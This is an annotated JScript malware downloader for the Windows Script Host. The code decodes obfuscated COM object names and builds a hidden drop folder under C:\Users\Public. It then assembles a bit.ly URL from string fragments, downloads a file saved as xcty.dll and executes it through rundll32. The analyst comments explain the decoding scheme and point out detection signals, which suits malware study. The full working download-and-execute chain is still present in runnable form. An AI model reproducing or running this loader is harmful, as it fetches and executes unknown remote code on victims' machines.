// Annotated JScript downloader. It runs under the Windows Script Host (wscript/cscript), not in a
// browser: the /* global WScript */ directive and the WScript.CreateObject call below show that.
// (Original header said "JavaScript Document"; it is JScript, actually.)
/* global WScript, exit, eof */
var sID;  // declared but never used: the code below assigns sId (JScript is case-sensitive)
var sIDW; // declared but never used: the code below assigns sIdW
var xID = 91; // numeric key for wdecrypt1064; the same value is written to the "idw" marker file below
var cID = "LIKINHYICFWIRGD"; // encoded; wdecrypt1064(cID, 91) yields "load-s3"
var cWN3t = "FHIHEHUIKIBIIIMFRGYHWIMIPIHIKID"; // encoded; decodes to the COM ProgID "WScript.Network"
var sNomeMaq; // computer name (variable names look like Portuguese abbreviations; not verifiable here)
var cFolder = "C:\\Users\\Public\\"; // base of the drop folder, extended with part of the PC name below
var cScrF1l3 = "CHBHRIHHXIFIJHXIDHVFOGNHXIBHTHBIOIIIJHTICGWHQHYHTHRIJ"; // encoded; decodes to the ProgID "Scripting.FileSystemObject"
var c1nf3ctz = ""; // starts empty; only a query string is ever appended to it, never a host
var sTipoSO; // set to "32" or "64" below, but never read afterwards in this script
var sAwvx = "NHYBVGTVFGTDCE"; // never used in this script
var cHosttotal; // download URL, assembled from the cHost fragments
var NAMEWG141 = "xcty.dll"; // file name passed to rundll32
var NAMENP413 = "xcty.dll"; // file name the payload is saved under (same value)
var cHost287 = "ht"; // the cHost variables are strung together to form a URL:
var cHost771 = "tp"; // http://bit.ly/2KOVf8Z
var cHost983 = ":/";
var cHost300 = "/b";
var cHost529 = "it";
var cHost840 = ".l";
var cHost694 = "y/";
var cHost448 = "2K";
var cHost158 = "OV";
var cHost280 = "f8";
var cHost360 = "Z";
// Path setup. ActiveXObject here is JScript's COM bridge under WSH; that bridge is the reason the
// script does not work in browsers that lack it.
var network = new ActiveXObject(wdecrypt1064(cWN3t,xID)); // decodes to "WScript.Network"
sNomeMaq = network.computerName; // local computer name via the WScript.Network object
cFolder = cFolder + sNomeMaq.substring(0, 3) + "OLNM822\\"; // C:\Users\Public\ABCOLNM822\ where "ABC" are the first three letters of the PC name
sId = cFolder + "id"; // sId, not the declared sID: an implicit global. C:\Users\Public\ABCOLNM822\id, used as a first-run marker
sIdW = cFolder + "idw"; // likewise an implicit global. C:\Users\Public\ABCOLNM822\idw
cHosttotal = cHost287+cHost771+cHost983+cHost300+cHost529+cHost840+cHost694+cHost448+cHost158+cHost280+cHost360; // fragments joined: http://bit.ly/2KOVf8Z (a shortener; the final destination is not visible from the script)
c1nf3ctz = c1nf3ctz +"?tmpString=" + cHosttotal + "&pcn=" + network.computerName+ "&AT=" + 0905; // not decoded, just concatenated: ?tmpString=http://bit.ly/2KOVf8Z&pcn=<ComputerName>&AT=905 - a leading-zero literal containing a 9 is read as decimal 905 by non-strict engines; confirm on the target engine
// Marker and system checks, then an attempt to download the payload and save it to disk
var fso = WScript.CreateObject(wdecrypt1064(cScrF1l3,xID)); // decodes to "Scripting.FileSystemObject"
if (!fso.FileExists(sId) && fso.FolderExists("C:\\Users\\Public\\")) // runs only when the "id" marker does NOT exist yet AND C:\Users\Public\ exists (first-run guard; the original note had the condition backwards)
{
    try{
        down3546(c1nf3ctz) // host-less query string and no file argument: the request presumably cannot be opened and the error lands in the empty catch
    }
    catch(err) {}
    if (!fso.FolderExists(cFolder)) // create the per-machine drop folder if it is missing
    {
        fso.CreateFolder(cFolder);
    }
    if (fso.FolderExists("C:\\Program Files (x86)\\")) // 64-bit heuristic: the WOW64 program folder exists
    {
        sTipoSO = "64";
    }
    else
    {
        sTipoSO = "32";
    }
    var s = fso.CreateTextFile(sId, true); // create the "id" marker (true = overwrite); its existence makes this whole block run once per machine
    s.WriteLine(wdecrypt1064(cID,xID)); // decodes to "load-s3"
    s.Close();
    var s2 = fso.CreateTextFile(sIdW, true); // create C:\Users\Public\ABCOLNM822\idw and...
    s2.WriteLine("91"); // ...write "91" to it, the same value as xID
    s2.Close();
    try
    {
        down3546(cHosttotal) // URL but no file argument: the GET is sent, then SaveToFile(undefined) presumably throws into the empty catch
    }
    catch(err) {}
    down3546(cHosttotal, "C:\\Users\\Public\\"+ NAMENP413); // download to C:\Users\Public\xcty.dll; this call is not inside a try, so an exception here ends the script before anything is run
    try
    {
        run1176("RunDll32.exe C:\\Users\\Public\\"+ NAMEWG141 + ",thnde"); // execute the payload via rundll32 calling its export "thnde"; rundll32 loading a DLL from C:\Users\Public\ is a useful detection signal
    }
    catch(err) {}
}
// Decodes an obfuscated string. It is NOT derived from the computer name: each output character is
// encoded as a pair of letters read as base-25 digits (offset from 'A'), the first character of the
// input is an extra per-string offset, and id is a fixed numeric key (91 everywhere in this script).
// Returns the decoded string (e.g. "WScript.Network" for cWN3t).
function wdecrypt1064(s1, id)
{
    var sx; // assigned but never used
    var x;  // assigned but never used
    var x4; // per-string offset taken from the first character
    var sr; // decoded result, built up one character per pair
    var wx1; // high "digit" of the current pair
    var wx2; // low "digit" of the current pair
    var wxgx1; // 65 = 'A'; letters map to 0..25 by subtracting it
    wxgx1 = 65;
    sr = "";
    sx = "";
    x = 0;
    x4 = s1.charCodeAt(0) - wxgx1; // e.g. 'F' - 'A' = 5 for cWN3t
    s1 = s1.substring(1); // drop the offset character; the rest is consumed two characters at a time
    while (s1.length > 0){ // 30 characters remain for cWN3t, i.e. 15 output characters
        wx1 = (s1.charCodeAt(0)-wxgx1); // 'H' -> 7 on the first pass for cWN3t
        wx2 = (s1.charCodeAt(1)-wxgx1); // 'I' -> 8 on the first pass
        sr = sr + String.fromCharCode( wx1 * 25 + wx2 - x4 - id); // 7*25 + 8 - 5 - 91 = 87 = 'W'; the loop spells "WScript.Network"
        s1 = s1.substring(2); // advance to the next pair
    }
    return sr; // "WScript.Network" for cWN3t, "Scripting.FileSystemObject" for cScrF1l3, "load-s3" for cID
}
// Fetches url synchronously with WinHttpRequest and writes the raw response body to `file` via
// ADODB.Stream. Returns false on a 404 or on any exception while requesting, true once the file is
// written. In this script it is called twice without a file argument (inside try/catch) and once
// with C:\Users\Public\xcty.dll.
function down3546(url, file) {
    var data; // raw response bytes
    var ado;  // ADODB.Stream used to persist them
    try
    {
        var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); // WinHTTP COM client, independent of browser settings
        // ResolveTimeout, ConnectTimeout, SendTimeout, ReceiveTimeout (milliseconds)
        WinHttpReq.SetTimeouts(30000, 30000, 30000, 5000);
        void(WinHttpReq.Open("GET", url, false)); // synchronous GET (false = not asynchronous); the bit.ly redirect is followed by WinHTTP's default redirect handling, presumably
        WinHttpReq.Send(); // sends the request and blocks until the response arrives
        if (WinHttpReq.Status == 404) // only 404 counts as failure; any other status falls through and its body is written to disk
        {
            return false;
        }
        data = WinHttpReq.ResponseBody; // response body as an array of unsigned bytes
    }
    catch (ex)
    {
        //WScript.Echo("Error downloading file: " + ex.message);  -- left commented out by the author: the script fails silently
        return false;
    }
    ado = new ActiveXObject("ADODB.Stream");
    ado.Type = 1; // adTypeBinary
    ado.Open();
    ado.Write(data); // buffer the bytes in the stream
    ado.SaveToFile(file, 2); // 2 = adSaveCreateOverWrite: replace an existing file; with file undefined this throws, which the callers' try/catch absorbs
    ado.Close();
    return true;
}
// Launches `file` as a command line through WScript.Shell.Exec, i.e. spawns a child process of the
// script host. In this script the command is rundll32 with the downloaded DLL and an export name.
function run1176(file) {
    var ws = new ActiveXObject("WScript.Shell");
    ws.Exec(file); // Exec (unlike Run) returns immediately with a WshScriptExec; the handle is discarded, so the script does not wait for the child
}